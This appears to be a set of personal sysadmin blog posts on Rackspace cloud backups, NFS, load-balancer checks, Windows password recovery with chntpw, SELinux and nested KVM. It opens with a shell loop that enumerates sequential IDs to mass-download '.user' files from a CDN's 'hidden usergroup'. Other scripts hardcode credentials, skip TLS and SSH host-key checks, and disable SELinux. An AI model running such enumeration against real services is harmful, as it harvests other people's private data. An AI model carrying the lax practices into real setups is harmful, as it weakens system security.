#!/bin/sh
# just use uuid's instead of sequential numbers hehe
for a in `seq 10000000 90000000`; do
  for b in `seq 1 10`; do
    #echo "http://cdn.anonymous.com/${a}_${b}.user"
    wget "http://cdn.anonymous.com/${a}_${b}.user"
    #curl "http://cdn.anonymous.com/${a}_${b}.user" -o "${a}_${b}.user"
    filesize=`ls -al "${a}_${b}.user" | awk '{print $5}'`
    echo "FILESIZE= $filesize"
    if [ "$filesize" -eq "49" ]; then
      echo "404: Empty fakefile HTTP 200 detected! The end of this hidden usergroup was detected"
      echo "Cleaning up.."
      rm "${a}_${b}.user"
      break
    else
      echo "200: Continuing"
    fi
    sleep 4
  done
done
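Parsing `ls -al` output for the file size, as the script above does, is fragile. A sketch of a more robust check using `stat` (the helper name is mine, and `stat -c %s` assumes GNU coreutils; BSD stat would need `stat -f %z`):

```shell
# Hypothetical helper: succeed (exit 0) when the file is exactly 49 bytes,
# the size of the "fake 404" marker file the loop above looks for.
is_fake_404() {
  size=$(stat -c %s "$1") || return 2
  [ "$size" -eq 49 ]
}

# demo on a temporary 49-byte file
tmp=$(mktemp)
head -c 49 /dev/zero > "$tmp"
if is_fake_404 "$tmp"; then
  echo "fake 404 detected"
fi
rm -f "$tmp"
```

This avoids depending on the column layout of `ls`, which varies between systems.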
Obscene Redundancy utilizing Rackspace Cloud Files
So, you may have noticed that over the past weeks and months I have been a little quieter about the articles I have been writing. That is mainly because I've been working on a new GitHub project which, although simple and lightweight, is actually rather outrageously powerful.
https://github.com/aziouk/obsceneredundancy
Imagine being able to take 15+ redundant replica copies of your files, across 5 or 6 different datacentres. It is powered by the Rackspace Cloud Files API, but also has a lot of the flexibility of the Bourne Again Shell (BASH).
This was actually quite a neat achievement and I am pleased with the results. There are still some limitations to this redundant replica application, and there are a few bugs, but it is a great proof of concept that shows what you can do with the API, both quickly and cheaply (ish). Filesystems as a service will be the future, given some further innovation in global network infrastructure, and it would only take a small breakthrough to rapidly alter the way that operating systems and machines boot and back up.
If you want to see the project and read the source code before I lay out and describe/explain the entire process of writing this software as well as how to deploy it with cron on linux, then you need wait no longer. Revision 1 alpha is now tested, ready and working in 5 different datacentres.
You can also toggle which datacentres you wish to utilize, so it is somewhat flexible. The important consideration is that there are some limitations, such as a lack of de-duplication, and that it uses tars and swiftly instead of querying the API directly. Since uploading a tar file directly through the API is relatively simple, I will probably implement it that way (as I have before) and get rid of swiftly in future iterations. A project like this is really ideal for learning more about BASH, cron, APIs, and the programmatic automation of sequential filesystems, using functional programming and division of labour between workers.
https://github.com/aziouk/obsceneredundancy
Test it (please note it will be a little buggy in different environments, and there are no instructions yet):
git clone https://github.com/aziouk/obsceneredundancy
Cheers &
Best wishes,
Adam
Downloading / Backing up all Rackspace Cloud Files
Here’s a quick and dirty way to download your entire Rackspace Cloud Files container. This comes up a lot at work.
INSTALLING SWIFTLY
# Debian / Ubuntu systems
apt-get install python-pip

# CentOS and Red Hat systems
yum install python-pip

# then install swiftly itself
pip install swiftly
Once you have installed swiftly, you will want to configure your swiftly client. This is also relatively easy.
CONFIGURING SWIFTLY
# create a file in your 'home' directory. ~ expands to the home directory of
# the current user (/root if logged in as root on a unix server)
touch ~/.swiftly.conf
You will want to edit the file above
pico ~/.swiftly.conf
The file needs to look exactly like the text below:
[swiftly]
auth_user = yourmycloudusername
auth_key = yourapikey
auth_url = https://identity.api.rackspacecloud.com/v2.0
region = LON
To save in pico you type CTRL + O
You have now installed swiftly, and configured swiftly. You should then be able to simply run the command:
Running swiftly to download all containers/files on Rackspace Cloud Files
swiftly get --all-objects --output=mycloudfiles/
This comes up a lot, I am sure that some people out there will appreciate this!
Configuring Basic NFS Server+Client on RHEL7
So, you want to configure NFS? This isn't too difficult to do. In the simplest setup you will need two servers: one acting as the NFS server, which hosts the content and attached disks, and a second acting as the client, which mounts the filesystem of the NFS server over the network to a local mount point. In RHEL 7 this is remarkably easy to do.
Install and Configure NFS on the Server
Install dependencies
yum -y install nfs-utils rpcbind
Create a directory on the server
This is the directory we will share
mkdir -p /opt/nfs
Configure access for the client server on ip 10.0.0.2
vi /etc/exports

# alternatively you can directly pipe the configuration, but I don't recommend it
echo "/opt/nfs 10.0.0.2(no_root_squash,rw,sync)" > /etc/exports
Open Firewall ports used by NFS
firewall-cmd --zone=public --add-port=2049/tcp --permanent
firewall-cmd --reload
Restart NFS services & check NFS status
service rpcbind start; service nfs start
service nfs status
Install and configure NFS on the Client
Install dependencies & start rpcbind
yum install nfs-utils rpcbind
service rpcbind start
Create directory to mount NFS
# Directory we will mount our network filesystem on, on the client
mkdir -p /mnt/nfs

# The server IP address is 10.0.0.1, with the path /opt/nfs; we want to mount it
# on the client at /mnt/nfs. This could be anything, like /mnt/randomdata-1234 etc,
# as long as the folder exists.
mount 10.0.0.1:/opt/nfs /mnt/nfs/
Check that the NFS works
echo "meh testing.." > /mnt/nfs/testing.txt
cat /mnt/nfs/testing.txt
ls -al /mnt/nfs
You should see that the filesystem now has testing.txt on it, confirming you set up NFS correctly.
Make NFS mount permanent by enabling the service permanently, and adding the mount to fstab
This will cause the server to automount the fs during boot time
systemctl enable nfs-server
vi /etc/fstab

10.0.0.1:/opt/nfs  /mnt/nfs  nfs  defaults  0 0

# OR you could simply append the configuration to the file (this is really
# dangerous though, unless you are absolutely sure what you are doing)
echo "10.0.0.1:/opt/nfs /mnt/nfs nfs defaults 0 0" >> /etc/fstab
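To keep the server, export path and mount point in one place, the fstab entry can be generated by a small helper rather than typed by hand (the function name is my own sketch):

```shell
# Hypothetical helper: build an fstab line for an NFS mount from its three parts
nfs_fstab_line() {
  printf '%s:%s %s nfs defaults 0 0\n' "$1" "$2" "$3"
}

nfs_fstab_line 10.0.0.1 /opt/nfs /mnt/nfs
# only append to fstab once you have eyeballed the output:
# nfs_fstab_line 10.0.0.1 /opt/nfs /mnt/nfs >> /etc/fstab
```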
If you reboot the client now, you should see that the NFS mount comes back.
Using Rackspace Cloud Files, swiftly and cron to Backup Data to multiple data-centres cheaply
So, you have some really important data, so much so that 99.99% redundancy is not enough for you. One solution is to keep multiple copies in multiple datacentres. Most enterprise backup strategies have an on-site copy, an off-site copy, and an archival copy. What I'm going to show here is how to make 4 different copies of your data, in 4 different datacentres around the world. This provides very high storage redundancy and greatly reduces the likelihood of data loss. Although it costs a bit more, this kind of solution may be suitable for many small, medium and large businesses, depending on the size of the data and the importance of redundancy. You might not have many files to back up, perhaps a small CD's worth, in which case it will be very inexpensive. However, due to the way that Cloud Files is billed, writing data from a server in London to Cloud Files in Sydney, Chicago or Dallas costs money in bandwidth, so it's very important to consider the impact of bandwidth costs when utilizing the 3 additional Cloud Files endpoints that are not in the local datacentre region, which is essentially what we are doing in this guide.
Setup swiftly
yum install python-devel python-pip -y
pip install swiftly eventlet
Create your swiftly environments (setting the name for each file)
==> /root/.swiftly-dfw.conf <==
[swiftly]
auth_user = myusername
auth_key = censored
auth_url = https://identity.api.rackspacecloud.com/v2.0
region = dfw

==> /root/.swiftly-iad.conf <==
[swiftly]
auth_user = myusername
auth_key = censored
auth_url = https://identity.api.rackspacecloud.com/v2.0
region = iad

==> /root/.swiftly-ord.conf <==
[swiftly]
auth_user = myusername
auth_key = censored
auth_url = https://identity.api.rackspacecloud.com/v2.0
region = ord

==> /root/.swiftly-syd.conf <==
[swiftly]
auth_user = myusername
auth_key = censored
auth_url = https://identity.api.rackspacecloud.com/v2.0
region = syd
Create your Script
# Adam Bull, Rackspace UK
# May 17, 2016
# This can be sequential or it can be parallel; not sure which is better yet. Use & for parallel.
# This backs up the /documents directory and puts it in the 'managed_backup'
# cloud files container at the following 4 datacentres: DFW, IAD, ORD and SYD
swiftly --verbose --conf ~/.swiftly-dfw.conf --concurrency 100 put -i /documents /managed_backup
swiftly --verbose --no-snet --conf ~/.swiftly-iad.conf --concurrency 100 put -i /documents /managed_backup
swiftly --verbose --no-snet --conf ~/.swiftly-ord.conf --concurrency 100 put -i /documents /managed_backup
swiftly --verbose --no-snet --conf ~/.swiftly-syd.conf --concurrency 100 put -i /documents /managed_backup
Because the other 3 endpoints are in different datacentres, we can't use ServiceNet, so we pass the --no-snet option to swiftly for those, as above.
Execute your script
chmod +x multibackup.sh
./multibackup.sh
This is obviously a basic system and script for taking backups, and it is not for production use (yet). This is an alpha project I started today. The cool thing is that it works, and quite nicely, although it is far from finished as a workable script.
Once the script is made, you can simply add it to crontab -e as you would usually. Make sure the user you execute with cron has access to the .conf files in their home directory!
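As a sketch, the crontab entry might look like this (the script path, log path and schedule are my assumptions; adjust to taste):

```
# m h dom mon dow  command
0 2 * * * /root/multibackup.sh >> /var/log/multibackup.log 2>&1
```

Redirecting both stdout and stderr to a log file makes it much easier to spot a failed swiftly upload after the fact.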
Checking Load Balancer Connectivity & Automating it in some interesting ways
So, in a dream last night, I woke up realising I had forgot to write my automated load balancer connectivity checker.
Basically, sometimes a customer will complain their site is down because their 'load balancer is broken'! In many cases, this is actually due to a firewall on one of the nodes behind the load balancer, or an issue with the webserver application listening on the port. So, I wrote a little piece of automation in the form of a BASH script, which accepts a Load Balancer ID, uses the API to pull the server nodes behind that Load Balancer (including the ports being used to communicate), and then uses either netcat or nmap to check each port for connectivity. There were a few ways to achieve this, but the below is what I was happiest with.
#!/bin/bash
# Username used to login to control panel
USERNAME='mycloudusernamegoeshere'
# Find the APIKey in the 'account settings' part of the menu of the control panel
APIKEY="apikeygoeshere"
# Your Rackspace account number (the number that is in the URL of the control panel after logging in)
ACCOUNT=100101010
# Your Rackspace loadbalancerID
LOADBALANCERID=157089
# Rackspace LoadBalancer Endpoint
ENDPOINT="https://lon.loadbalancers.api.rackspacecloud.com/v1.0"
# This section simply retrieves and sets the TOKEN
TOKEN=`curl https://identity.api.rackspacecloud.com/v2.0/tokens -X POST -d '{ "auth":{"RAX-KSKEY:apiKeyCredentials": { "username":"'$USERNAME'", "apiKey": "'$APIKEY'" }} }' -H "Content-type: application/json" | python -mjson.tool | grep -A5 token | grep id | cut -d '"' -f4`
# (UNUSED) METHOD 1: Extract IP addresses (currently assuming port 80 only)
#curl -H "X-Auth-Token: $TOKEN" -H "Accept: application/json" -X GET "$ENDPOINT/$ACCOUNT/loadbalancers/$LOADBALANCERID/nodes" | jq .nodes[].address | xargs -i nmap -p 80 {}
# (UNUSED) Extract ports
# curl -H "X-Auth-Token: $TOKEN" -H "Accept: application/json" -X GET "$ENDPOINT/$ACCOUNT/loadbalancers/$LOADBALANCERID/nodes" | jq .nodes[].port | xargs -i nmap -p 80 {}
# I opted for using this method to extract the important detail
curl -H "X-Auth-Token: $TOKEN" -H "Accept: application/json" -X GET "$ENDPOINT/$ACCOUNT/loadbalancers/$LOADBALANCERID/nodes" | jq .nodes[].address | sed 's/"//g' > address.txt
curl -H "X-Auth-Token: $TOKEN" -H "Accept: application/json" -X GET "$ENDPOINT/$ACCOUNT/loadbalancers/$LOADBALANCERID/nodes" | jq .nodes[].port > port.txt
# Loop thru both output files sequentially, order is important
# WARNING script does not ignore whitespace
while read addressfile1 <&3 && read portfile2 <&4; do
ncat $addressfile1 $portfile2
done 3<address.txt 4<port.txt
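The two-descriptor read pattern used above can be sandboxed locally with fabricated addresses and ports (the files and values below are made up for the demo; the real script feeds them from the Load Balancer API):

```shell
# Fabricated node list and port list, one entry per line, in matching order
printf '10.0.0.1\n10.0.0.2\n' > address.txt
printf '80\n443\n' > port.txt

# read -r avoids backslash mangling; descriptors 3 and 4 are wired to the
# two files on the `done` line so both are consumed in lockstep
while read -r addr <&3 && read -r port <&4; do
  echo "would check ${addr}:${port}"
done 3<address.txt 4<port.txt

rm -f address.txt port.txt
```

In the real script the `echo` line is where `ncat $addr $port` goes.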
Output looks a bit like;
# ./lbtest.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5143 100 5028 100 115 4731 108 0:00:01 0:00:01 --:--:-- 4734
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 225 100 225 0 0 488 0 --:--:-- --:--:-- --:--:-- 488
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 225 100 225 0 0 679 0 --:--:-- --:--:-- --:--:-- 681
Ncat: No route to host.
Ncat: Connection timed out.
I plan to add some additional support that will check the load balancer is up, AND the servicenet connection between the cloud servers.
Please note that this script must be run on a machine with access to servicenet network, in the same Rackspace Datacenter to be able to check servicenet connectivity of servers. The script can give false positives if strict firewall rules are setup on the cloud server nodes behind the load balancer. It's kind of alpha-draft but I thought I would share it as a proof of concept.
You will need to download and install jq to use it. To download jq please see; https://stedolan.github.io/jq/download/
Windows Password reset for Rackspace Cloud Servers
In the previous articles, Using API and BASH to validate changing conditions and Reset windows administrator password using rescue mode without nova-agent, I explained the steps to reset the password of a Windows VM instance by modifying the SAM file using a Linux 'rescue' image in the cloud, and also how to automate the checks in BASH through the API. The checks specifically waited until the server entered rescue, then lifted the IPv4 address, connecting only once the rescue server had finished building.
That way the automation handles the delay, as well as setting and lifting the access credentials and IP address each time. Here is the complete script. Please note that backticks are deprecated, but I'm a bit 'oldskool'. This is a rough alpha, but it works really nicely. In testing it consistently allows ourselves, or our customers, to reset a Windows Cloud Server password when a customer loses access and cannot use other Rackspace services to do the reset. This effectively turns a useless server back into a usable one, and saves a lot of time.
#!/bin/bash
# Adam Bull, Rackspace UK
# This script automates the resetting of windows passwords
# NOTE: in this version the credentials and instance details are hardcoded
# below, rather than being passed in as arguments $1-$4
echo "Rackspace windows cloud server Password Reset"
echo "written by Adam Bull, Rackspace UK"
sleep 2
PASSWORD=39fdfgk4d3fdovszc932456j2oZ
# Provide an instance uuid to rescue and reset windows password
USERNAME=mycloudusernamehere
APIKEY=myapikeyhere
# DDI is the 'customer ID', if you don't know this login to the control panel and check the number in the URL
DDI=10010101
# The instance uuid you want to rescue
INSTANCE=ca371a8b-748e-46da-9e6d-8c594691f71c
# INITIATE RESCUE PROCESS
nova --os-username $USERNAME --os-auth-system=rackspace --os-tenant-name $DDI --os-auth-url https://lon.identity.api.rackspacecloud.com/v2.0/ --os-password $APIKEY --insecure rescue --password "$PASSWORD" --image 7fade26a-0cca-415f-a988-49c021768fca $INSTANCE
# LOOP UNTIL STATE DETECTED AS RESCUED
STATE=0
until [[ $STATE == rescued ]]; do
echo "start rescue check"
STATE=`nova --os-username $USERNAME --os-auth-system=rackspace --os-tenant-name $DDI --os-auth-url https://lon.identity.api.rackspacecloud.com/v2.0/ --os-password $APIKEY --insecure show $INSTANCE | grep rescued | awk '{print $4}'`
echo "STATE =" $STATE
echo "sleeping.."
sleep 5
done
# EXTRACT PUBLIC ipv4 FROM INSTANCE
IP=`nova --os-username $USERNAME --os-auth-system=rackspace --os-tenant-name $DDI --os-auth-url https://lon.identity.api.rackspacecloud.com/v2.0/ --os-password $APIKEY --insecure show $INSTANCE | grep public | awk '{print $5}' | grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])'`
echo "IP = $IP"
# UPDATE AND INSTALL RESCUE TOOLS AND RESET WINDOWS PASS
# Set environment locally
yum install sshpass -y
# Execute environment remotely
echo "Performing Rescue..."
sshpass -p "$PASSWORD" ssh -o StrictHostKeyChecking=no root@"$IP" 'yum update -y; yum install ntfs-3g -y; mount /dev/xvdb1 /mnt; curl li.nux.ro/download/nux/dextop/el7/x86_64/nux-dextop-release-0-5.el7.nux.noarch.rpm -o /root/nux.rpm; rpm -Uvh /root/nux.rpm; yum install chntpw -y; cd /mnt/Windows/System32/config; echo -e "1\ny\n" | chntpw -u "Administrator" SAM'
echo "Unrescuing in 100 seconds..."
sleep 100
nova --os-username $USERNAME --os-auth-system=rackspace --os-tenant-name $DDI --os-auth-url https://lon.identity.api.rackspacecloud.com/v2.0/ --os-password $APIKEY --insecure unrescue $INSTANCE
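The IPv4 extraction regex used in the script above can be sanity-checked locally against a fabricated line of `nova show`-style output (the address is from the TEST-NET-3 documentation range, purely for the demo):

```shell
# A made-up sample line mixing an IPv4 and an IPv6 address
line='| accessIPv4 | public=203.0.113.10, 2001:db8::1 |'

# Only the dotted-quad IPv4 address should be extracted
echo "$line" | grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])'
```

Trying the regex on canned input like this is a quick way to catch quoting mistakes before pointing the script at a live instance.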
Thanks again to my friend Cory who gave me the instructions, I simply automated the process to make it easier and learned something in the process 😉
Disabling SELinux
Today we had a customer that needed to perform a first generation to next generation server migration; however, they could not have SELinux enabled during this process.
I explained to the customer how to disable it; it's pretty simple.
vi /etc/sysconfig/selinux
SELINUX=enforcing
Needs to be changed to
SELINUX=disabled
Job done. A simple one but nonetheless important stuff. If you wanted to automate this it would look something like this;
sed -i 's/SELINUX=enforcing/SELINUX=disabled/g' /etc/selinux/config
This sed one-liner simply swaps SELINUX=enforcing for SELINUX=disabled, pretty simple stuff. Note that a reboot is required for the change to take effect. It will work on CentOS 6 and 7; it should also work on CentOS 5, but I can't guarantee that.
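Before touching the live config, the substitution can be tried safely on a temporary copy:

```shell
# Rehearse the sed swap on a throwaway file rather than the real config
tmp=$(mktemp)
echo "SELINUX=enforcing" > "$tmp"
sed -i 's/SELINUX=enforcing/SELINUX=disabled/g' "$tmp"
cat "$tmp"    # SELINUX=disabled
rm -f "$tmp"
```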
Configure Nested KVM for Intel & AMD based Machines
So, we are configuring some OpenStack and KVM stuff at work for some projects. We're 'cloudy' guys. What can I say? 😀 One issue I had was when installing XenServer underneath KVM.
(Why would we do this?) In our testing environment we're using a single OnMetal v2 server and, instead of running XenServer directly on the server and requiring additional servers, we are using a single 128GB RAM hypervisor for the test environment. One issue, though, is that Windows is only supported with XenServer when it runs directly on the 'host'. Because Xen is running virtualized under KVM, we have a problem.
Enter nested virtualization support. Hardware virtualization assist will now work for XenServer through KVM, which means I can boot Windows servers. YAY! uh.. 😉 kinda.
Check if Nested hardware virtualization assist is enabled
$ cat /sys/module/kvm_intel/parameters/nested
N
It wasn’t 🙁 Lets enable it
Enable nested hardware virtualization assist
sudo rmmod kvm-intel
sudo sh -c "echo 'options kvm-intel nested=y' >> /etc/modprobe.d/dist.conf"
sudo modprobe kvm-intel
Ensure nested hardware virtualization is enabled
cat /sys/module/kvm_intel/parameters/nested
Y

modinfo kvm_intel | grep nested
parm:           nested:bool
It worked!
This can also be done for AMD systems simply substituting kvm_amd.
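The check above can be wrapped in a small helper that works for either vendor module (the function name is my own; on some kernels the parameter file contains `1`/`0` rather than `Y`/`N`, which the regex allows for):

```shell
# Hypothetical helper: succeed when nested virt is enabled for kvm_intel or kvm_amd
nested_enabled() {
  vendor="${1:-intel}"                                   # "intel" or "amd"
  f="/sys/module/kvm_${vendor}/parameters/nested"
  [ -r "$f" ] && grep -qiE '^(Y|1)$' "$f"
}

if nested_enabled intel; then
  echo "nested virt: enabled"
else
  echo "nested virt: disabled or kvm_intel not loaded"
fi
```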
http://docs.openstack.org/developer/devstack/guides/devstack-with-nested-kvm.html
HOWTO: Rackspace Automation, Using BASH with API (to validate conditions to perform conditional tasks)
In the previous article, I showed how to wipe clean the Windows password of a broken Virtual Machine that you were locked out of, by rescuing it with a Linux image. In this article I explain how to automate this with a bash script that looks at the STATE of the server and accepts command-line arguments.
It’s quite a simple script;
#!/bin/bash
# Adam Bull
# April 28 2016
# This script automates the resetting of windows passwords
# Arguments $1 == username
# Arguments $2 == apikey
# Arguments $3 == ddi
# Arguments $4 == instanceuuid

PASSWORD=mypassword

# Provide an instance uuid to rescue and reset windows password
USERNAME=$1
APIKEY=$2
DDI=$3
INSTANCE=$4

nova --os-username $USERNAME --os-auth-system=rackspace --os-tenant-name $DDI --os-auth-url https://lon.identity.api.rackspacecloud.com/v2.0/ --os-password $APIKEY --insecure rescue --password "$PASSWORD" --image 7fade26a-0cca-415f-a988-49c021768fca $INSTANCE
The above script takes the arguments given on the command line: the first argument, $1, is the Rackspace mycloud username; the second argument is the apikey; and so on. This basically puts the server into rescue. But what if we wanted to run some automation AFTER it rescued? We don't want to let the automation ssh to the box and run early, so we can use a supernova show to find whether the VM state has changed to 'rescued'. Whilst it's initiating, the state will be 'rescuing'. So we have the option of looping while the state is not 'rescued', or until it equals 'rescued'. Let's use 'until equal to rescued' in our validation loop.
This loop will continue until the task state changes to the desired value. Here is how we achieve it
#!/bin/bash
# Initialize Variable
STATE=0
# Validate $STATE variable, looping UNTIL $STATE == rescued
until [[ $STATE == rescued ]]; do
echo "start rescue check"
# 'show' the servers data, and grep for rescued and extract only the correct value if it is found
STATE=`nova --os-username $USERNAME --os-auth-system=rackspace --os-tenant-name $DDI --os-auth-url https://lon.identity.api.rackspacecloud.com/v2.0/ --os-password $APIKEY --insecure show $INSTANCE | grep rescued | awk '{print $4}'`
# For debugging
echo "STATE =" $STATE
echo "sleeping.."
# For API Limit control
sleep 5
# Exit the loop once until condition satisfied
done
# Post Rescue
echo "If you read this, it means that the program detected a rescued state"
It’s quite a simple script to use. We just provide the arguments $1, $2, $3 and $4.
./rescue.sh mycloudusername mycloudapikey 10010101 e744af0f-6643-44f4-a63f-d99db1588c94
Where 10010101 is the tenant id and e744af0f-6643-44f4-a63f-d99db1588c94 is the UUID of your server.
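Since the script trusts its positional arguments, a small guard at the top fails fast on a missing argument instead of calling the API with blanks. This is a sketch; the function name and usage text are my own:

```shell
# Hypothetical guard for the top of rescue.sh: insist on exactly 4 arguments
check_args() {
  if [ "$#" -ne 4 ]; then
    echo "usage: rescue.sh <username> <apikey> <ddi> <instance-uuid>" >&2
    return 1
  fi
  echo "arguments OK"
}

check_args mycloudusername mycloudapikey 10010101 e744af0f-6643-44f4-a63f-d99db1588c94
```

In the real script you would replace the `echo` success branch with the variable assignments, i.e. `USERNAME=$1` and so on.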
It’s really quite simple to do! But this is not enough we want to go a step further. Let’s move the rescue.sh to /bin
# WARNING: /bin is not a playground; this is for demonstration purposes
# of how to 'install' bin system applications
cp rescue.sh /bin/rescue.sh
Now you can call the command ‘rescue’.
rescue mycloudusername mycloudapikey mycustomerid mycloudserveruuidgoeshere
Nice, and quite simple too. Obviously, 'post rescue' in the script, I can upload a script via ssh to the server and then execute it remotely to perform the password reset.